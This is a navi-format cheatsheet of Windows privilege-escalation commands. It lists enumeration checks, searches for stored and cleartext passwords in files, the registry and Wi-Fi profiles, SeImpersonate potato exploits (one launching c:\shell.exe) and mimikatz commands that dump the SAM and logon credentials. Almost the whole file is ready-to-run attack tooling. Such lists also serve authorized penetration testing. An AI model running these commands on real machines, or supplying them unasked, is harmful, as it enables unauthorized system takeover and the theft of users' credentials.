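% privesc, windows, escalation

; navi cheatsheet: each `#` line describes the single command on the line after it.
; `<name>` placeholders in a command take their value from the matching `$ name:` line
; at the bottom of the file; an `echo ""` suggestion there means the value is typed in
; interactively. The file had been collapsed onto one line and the `<username>` and
; `<wifi_name>` placeholders had been stripped, leaving two commands that no longer
; used the variables they were declared for; both are restored below.

# System info
systeminfo

# Current user privileges
whoami /priv

# Current user groups
whoami /groups

# All users
net user

# Details of a specific user
net user <username>

# Local groups
net localgroup

# Administrators group
net localgroup administrators

# Services (brief listing)
wmic service list brief

# Installed patches
wmic qfe list

# Scheduled tasks
schtasks /query /fo LIST /v

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"

# Find directories under Program Files where Everyone has full control (F)
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"

# AlwaysInstallElevated check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Stored credentials
cmdkey /list

# SAM and SYSTEM backup
dir C:\Windows\Repair\SAM
dir C:\Windows\System32\config\RegBack\SAM

# PowerUp
Import-Module .\PowerUp.ps1; Invoke-AllChecks

# WinPEAS
.\winPEASany.exe

# Juicy Potato (SeImpersonate)
.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\shell.exe" -t *

# PrintSpoofer (SeImpersonate)
.\PrintSpoofer.exe -i -c cmd

# GodPotato (SeImpersonate)
.\GodPotato.exe -cmd "cmd /c whoami"

# Search for passwords in files
findstr /si password *.txt *.ini *.config

# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Check saved WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="<wifi_name>" key=clear

# Dump SAM with mimikatz
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

# Dump credentials with mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

; placeholder value providers for the `<username>` and `<wifi_name>` commands above
$ username: echo ""
$ wifi_name: echo ""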